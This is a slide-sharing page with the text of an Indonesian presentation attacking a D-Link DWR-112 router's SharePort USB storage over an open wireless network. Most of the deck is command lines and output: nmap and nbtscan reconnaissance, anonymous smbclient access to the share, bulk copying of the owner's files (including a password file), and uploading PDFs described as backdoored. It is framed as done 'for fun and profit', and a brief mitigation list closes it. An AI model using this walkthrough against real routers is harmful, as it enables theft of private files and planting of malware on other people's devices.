Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdf
 
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...
 
Utian Ayuba - Profiling The Cloud Crime.pdf
Utian Ayuba - Profiling The Cloud Crime.pdfUtian Ayuba - Profiling The Cloud Crime.pdf
Utian Ayuba - Profiling The Cloud Crime.pdf
 
Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...
 
Perkembangan infrastruktur kunci publik di indonesia - Andika Triwidada
Perkembangan infrastruktur kunci publik di indonesia - Andika TriwidadaPerkembangan infrastruktur kunci publik di indonesia - Andika Triwidada
Perkembangan infrastruktur kunci publik di indonesia - Andika Triwidada
 
Pentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - AbdullahPentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - Abdullah
 
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabella
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabellaHacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabella
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabella
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
 
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwianto
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi DwiantoDevsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwianto
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwianto
 

Dernier

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 

Dernier (20)

Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhartono

  • 1. 1 Information Theft @Wireless Router SharePort for Fun(D) by. SatanicBrain Pendahuluan Perkembangan teknologi router wireless semakin berkembang ke arah Network Storage, banyak sekali produk-produk router yang saat ini beredar dipasaran menyertakan port-port usb yang digunakan untuk sharing media penyipanan dan printer. Salah satu teknologinya adalah SharePort. SharePort merupakan teknologi baru yang banyak diterapkan pada radio wireless Access Point model-model terbaru, SharePort merupakan port usb yang biasa digunakan untuk Folder Sharing dan Printer Sharing. Tujuan adanya SharePort pada Access Point adalah agar user bisa mempergunakan media penyimpanannya yang berupa usb Flashdisk maupun harddisk secara remote melalui wireless, begitu juga dengan sharing printer yang diterapkannya agar user bisa melakukan pencetakan secara remote melalui wireless juga. Tanpa kita sadari pada teknologi tersebut sangatlah rentan terhadap tindakan penyerangan yang dapat menimbulkan kerugian yang sangat besar, yaitu : pencurian data, penghapusan data dan penanaman backdoor. Target Attacking Pada ujicoba kali ini,saya melakukan penyerangan terhadap devices dengan spesifikasi, sbb :  Access Point : D-Link  Series AP : DWR-112  Firmware version : 1.04  USB Port 1 : USB Hub yang terkonekasi USB Flashdisk dan Printer Persiapan Penyerangan  Notebook : Cukup notebook dengan wireless apa saja.  OS : Saya mempergunakan BT R3.
  • 2. 2 Skenario Penyerangan Keterangan :  Attacker akan melakukan penyerangan terhadap SharePort yang terdapat pada Access Point melalui wireless.  Attacker akan masuk kedalam usb flashdisk maupun harddisk untuk melakukan pencurian data dan kegiatan lainnya.  Attacker pun bisa melakukan penyerangan terhadap printer.
  • 3. 3 Melakukan Penyerangan 1. Lakukan koneksi ke Access Point (AP) yang menjadi target. Cek koneksi ke AP : root@bt:~# iwconfig lo no wireless extensions. wlan0 IEEE 802.11abg ESSID:"lirva32_was_here" Mode:Managed Frequency:2.457 GHz Access Point: C8:BE:19:8C:37:A4 Bit Rate=24 Mb/s Tx-Power=15 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=70/70 Signal level=-24 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 eth0 no wireless extensions. 2. Setelah koneksi berhasil, maka kita akan mendapatkan IP dari DHCP server. Sudah menjadi kebiasaan jika AP didirikan selalu saja DHCP juga didirikan dengan tujuan untuk mempermudah user melakukan koneksi ke wireless AP. Cek dapat IP berapa dari DHCP Server : root@bt:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:1d:72:19:45:4d UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Interrupt:16 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:474 errors:0 dropped:0 overruns:0 frame:0 TX packets:474 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:145389 (145.3 KB) TX bytes:145389 (145.3 KB) wlan0 Link encap:Ethernet HWaddr 00:1c:bf:00:5e:fb inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0 inet6 addr: fe80::21c:bfff:fe00:5efb/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1464 errors:0 dropped:0 overruns:0 frame:0 TX packets:53 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:161210 (161.2 KB) TX bytes:7250 (7.2 KB) Nah, devices wlan0 sudah mendapat IP dari DHCP, yaitu : 192.168.0.100 /24
  • 4. 3. Network Scannning, lakukan network scanning untuk mendapatkan target dengan baik dan benar. Tadi kita sudah mendapatkan IP untuk wlan0 kan...?? yaitu : 192.168.0.100 /24, maka kita akan lakukan proses network scanning 1 range IP yaitu : 192.168.0.1 - 192.168.0.254. 4 root@bt:~# nmap -T4 -F 192.168.0.0/24 Starting Nmap 6.25 ( http://nmap.org ) at 2013-03-26 10:26 WIT Nmap scan report for 192.168.0.1 Host is up (0.0081s latency). Not shown: 95 closed ports PORT STATE SERVICE 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown MAC Address: C8:BE:19:87:37:A4 (Unknown) Nmap scan report for 192.168.0.100 Host is up (0.000021s latency). Not shown: 99 closed ports PORT STATE SERVICE 80/tcp open http Nmap done: 256 IP addresses (2 hosts up) scanned in 34.24 second Hasil analisa :  Port 139/tcp open netbios-ssn. Port ini merupakan port Netbios Session Service yang biasanya digunakan untuk resource sharing pada windows. Contohnya adalah: Folder dan File Sharing, Printer Sharing.  Port 445/tcp open microsoft-ds. Port ini merupakan port Microsoft Directory Services yang biasanya digunakan untuk windows file sharing dan menyediakan banyak layanan lainnya. Port 445/ tcp juga ada sangkutannya dengan SMB over IP (SMB is known as "Samba"). Kedua Port tersebut yaitu : 139/tcp dan 445/tcp merupakan port yang sejak dulu dikenal sangat rentan untuk diserang. 4. Mari kita lakukan proses scanning yang lebih mendalam terhadap IP yang sudah ditargetkan untuk mendapatkan informasi yang lebih lengkap lagi.
  • 5. 5 root@bt:~# nmap -p 1-65535 -T4 -A -v 192.168.0.1 Starting Nmap 6.25 ( http://nmap.org ) at 2013-03-26 10:57 WIT NSE: Loaded 106 scripts for scanning. NSE: Script Pre-scanning. Initiating ARP Ping Scan at 10:57 Scanning 192.168.0.1 [1 port] Completed ARP Ping Scan at 10:57, 0.00s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 10:57 Completed Parallel DNS resolution of 1 host. at 10:57, 13.00s elapsed Initiating SYN Stealth Scan at 10:57 Scanning 192.168.0.1 [65535 ports] Discovered open port 53/tcp on 192.168.0.1 Discovered open port 80/tcp on 192.168.0.1 Discovered open port 139/tcp on 192.168.0.1 Discovered open port 445/tcp on 192.168.0.1 Discovered open port 49152/tcp on 192.168.0.1 Completed SYN Stealth Scan at 10:58, 32.92s elapsed (65535 total ports) Initiating Service scan at 10:58 Scanning 5 services on 192.168.0.1 Completed Service scan at 10:58, 11.22s elapsed (5 services on 1 host) Initiating OS detection (try #1) against 192.168.0.1 NSE: Script scanning 192.168.0.1. Initiating NSE at 10:58 Completed NSE at 10:58, 7.50s elapsed Nmap scan report for 192.168.0.1 Host is up (0.0031s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 1/tcp filtered tcpmux 53/tcp open domain dnsmasq 2.45 | dns-nsid: |_bind.version: dnsmasq-2.45 80/tcp open http? |_http-favicon: Unknown favicon MD5: 107579220745D3B21461C23024D6C4A3 |_http-methods: No Allow or Public header in OPTIONS response (status code 501) |_http-title: D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 49152/tcp open unknown - - - SF:99x2017:22:07x20GMTrnContent-Type:x20text/htmlrnContent-Length: SF:x20x20x20127rnrn<title>501x20Notx20Implemented</title>n<h1>501 SF:x20Notx20Implemented</h1>nYourx20requestx20wasx20notx20understoo SF:dx20orx20notx20allowedx20byx20thisx20server.n"); MAC Address: C8:BE:19:87:37:A4 (Unknown) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.17 - 2.6.36 Uptime guess: 0.054 days (since Tue Mar 26 09:41:33 2013) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=206 (Good luck!) IP ID Sequence Generation: All zeros
  • 6. 6 Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.24) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2000-01-01T01:22:11+08:00 | smb-security-mode: | Account that was used for smb scripts: guest | Share-level authentication (dangerous) | SMB Security: Challenge/response passwords supported |_ Message signing disabled (dangerous, but default) |_smbv2-enabled: Server doesn't support SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 3.12 ms 192.168.0.1 NSE: Script Post-scanning. Read data files from: /usr/local/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 68.65 seconds Raw packets sent: 65681 (2.891MB) | Rcvd: 65630 (2.626MB) Hasil analisa : * 53/tcp open domain dnsmasq 2.45 * http-title: D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME * 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) * 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) * MAC Address: C8:BE:19:87:37:A4 (Unknown) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 * Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.24) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2000-01-01T01:22:11+08:00 | smb-security-mode: | Account that was used for smb scripts: guest | Share-level authentication (dangerous) | SMB Security: Challenge/response passwords supported |_ Message signing disabled (dangerous, but default) |_smbv2-enabled: Server doesn't support SMBv2 protocol * Ternyata port 139/tcp dan 445/tcp mengaktifkan smbd 3.x dengan nama workgroup : WORKGROUP
  • 7. 7 5. Llanjutkan pada proses berikutnya, yaitu mengidentifikasi smbd 3.x : root@bt:~# nbtscan 192.168.0.1 Doing NBT name scan for addresses from 192.168.0.1 IP address NetBIOS Name Server User MAC address ------------------------------------------------------------------------------ 192.168.0.1 DWR-112 <server> DWR-112 00-00-00-00-00-00 root@bt:~# nbtscan -v -s : 192.168.0.1 192.168.0.1:DWR-112 �:00U 192.168.0.1:DWR-112 �:03U 192.168.0.1:DWR-112 �:20U 192.168.0.1:DWR-112 �:00U 192.168.0.1:DWR-112 �:03U 192.168.0.1:DWR-112 �:20U 192.168.0.1:WORKGROUP �:00G 192.168.0.1:WORKGROUP �:1eG 192.168.0.1:WORKGROUP �:00G 192.168.0.1:WORKGROUP �:1eG 192.168.0.1:MAC:00-00-00-00-00-00 Hasil analisa untuk smbd 3.x, yaitu :  IP : 192.168.0.1  NetBIOS Name : DWR-112  Server : <server>  User : DWR-112 6. Nah, sekarang saatnya kita lanjut pada proses penyerangan kepada media penyimpanannya : root@bt:~# smbclient -L 192.168.0.1 Enter root's password: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24] Sharename Type Comment --------- ---- ------- Drive_A5 Disk Device(A) (SanDisk,Firebird USB Flash Drive) IPC$ IPC IPC Service (DWR-112) Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24] Server Comment --------- ------- Workgroup Master --------- ------- *ketika diminta password cukup tekan enter saja. Hasil analisa :  Sharename : Drive_A5, IPC$
  • 8. 8 7. Kini saatnya memperdayai media penyimpanan target melalui smb console : root@bt:~# smbclient //DWR-112/Drive_A5 "" Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24] Server not using user level security and no password supplied. smb: > help ? allinfo altname archive blocksize cancel case_sensitive cd chmod chown close del dir du echo exit get getfacl hardlink help history iosize lcd link lock lowercase ls l mask md mget mkdir more mput newer open posix posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink print prompt put pwd q queue quit rd recurse reget rename reput rm rmdir showacls setmode stat symlink tar tarmode translate unlock volume vuid wdel logon listconnect showconnect .. ! smb: > [01] Melihat status koneksi ke smb : smb: > showconnect //DWR-112/Drive_A5 [02] Melihat isi usb flashdisk target : smb: > l . D 0 Thu Jan 1 07:00:00 1970 .. D 0 Fri Dec 31 23:00:26 1999 CCNA_Preparing D 0 Mon Nov 5 17:43:36 2012 CCNA_Preparing - Copy D 0 Mon Nov 5 17:43:36 2012 Copy please D 0 Wed Dec 5 13:51:24 2012 ebook_pilihan D 8857314 Sat Nov 10 10:56:02 2012 MODUL MIKROTIK D 0 Tue Aug 7 10:56:22 2012 ModulWiFiOkeh_cetak D 0 Mon Dec 3 16:14:22 2012 passwordspeedy.txt 471 Tue Nov 20 00:50:14 2012 PENTESTER CAREER.pptx 3057314 Sat Nov 10 10:56:02 2012 -* -* -* hal.dll 134400 Tue Aug 3 20:59:14 2004 Modul DBA.docx 1027752 Wed Mar 13 15:29:54 2013 ModulWireless_okeh_bgt.pdf 4624212 Fri Jan 11 10:40:48 2013 60xx1 blocks of size 6xx36. 15141 blocks available
  • 9. 9 [03] Mengambil isi usb flasdisk target : root@bt:/# mkdir /home/hasil root@bt:/# cd /home/hasil/ root@bt:/home/hasil# smbclient //DWR-112/Drive_A5 "" Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24] Server not using user level security and no password supplied smb: > mget *.* Get file 3030-3040.jpg? yes getting file 3030-3040.jpg of size 99947 as 3030-3040.jpg (1162.0 KiloBytes/sec) (average 1162.0 KiloBytes/sec) - - Get file hal.dll? yes getting file hal.dll of size 134400 as hal.dll (1274.3 KiloBytes/sec) (average 915.5 KiloBytes/sec) Get file Modul_Wireless.pdf? yes getting file Modul_Wireless.pdf of size 5512257 as Modul_Wireless.pdf (2019.2 KiloBytes/sec) (average 2064.6 KiloBytes/sec) Get file Modul_wokShop2_cetak.doc? yes getting file Modul_wokShop2_cetak.doc of size 32209354 as Modul_wokShop2_cetak.doc (1850.8 KiloBytes/sec) (average 1917.6 KiloBytes/sec) [05] Menanam backdoor ke isi usb flasdisk target : Dowload file pdf dari usb target smb: ebook_pilihan> mget *.pdf Get file Modul_wokShop2.pdf? yes getting file jasakom_workshop2Modul_wokShop2.pdf of size 5627760 as Modul_wokShop2.pdf (2006.5 KiloBytes/sec) (average 2006.5 KiloBytes/sec) nah, sekarang file *.pdf sudah kita dapatkan, kini saatnya file *.pdf tersebut Anda sisipkan backdoor. Maaf, saya tidak menulis bagaimana menyisipkan backdoor kedalam *.pdf, silahkan dicari saja di google ;)
  • 10. Setelah *.pdf Anda sisipkan backdoor, sekarang tinggal kita masukan saja *.pdf tersebut melalui smb console : smb: ebook_pilihan> mput *.pdf Put file Modul_wokShop2.pdf? yes putting file Modul_wokShop2.pdf as jasakom_workshop2Modul_wokShop2.pdf (1245.9 kb/s) (average 1245.9 kb/s) - - - Put file MICROSOFT SQL SERVER 7.pdf? yes putting file MICROSOFT SQL SERVER 7.pdf as jasakom_workshop2MICROSOFT SQL SERVER 7.pdf (1124.3 kb/s) (average 1209.3 kb/s) Melakukan Pengamanan Ada beberapa cara untuk mengurangi ketidak amanan, hanya mengurani saja kok, yaitu : 1. Usahakan untuk tidak mempergunakan fasilitas shareport terhadap usb flashdisk yg kita 10 miliki 2. Amankan koneksi wireless AP dengan WPS, WPA2 dan MAC Filter agar wireless kita tidak dipergunakan oleh pemakai yang tidak jelas. Referensi [1] http://www.samba.org/samba/docs/man/manpages-3/smbclient.1.html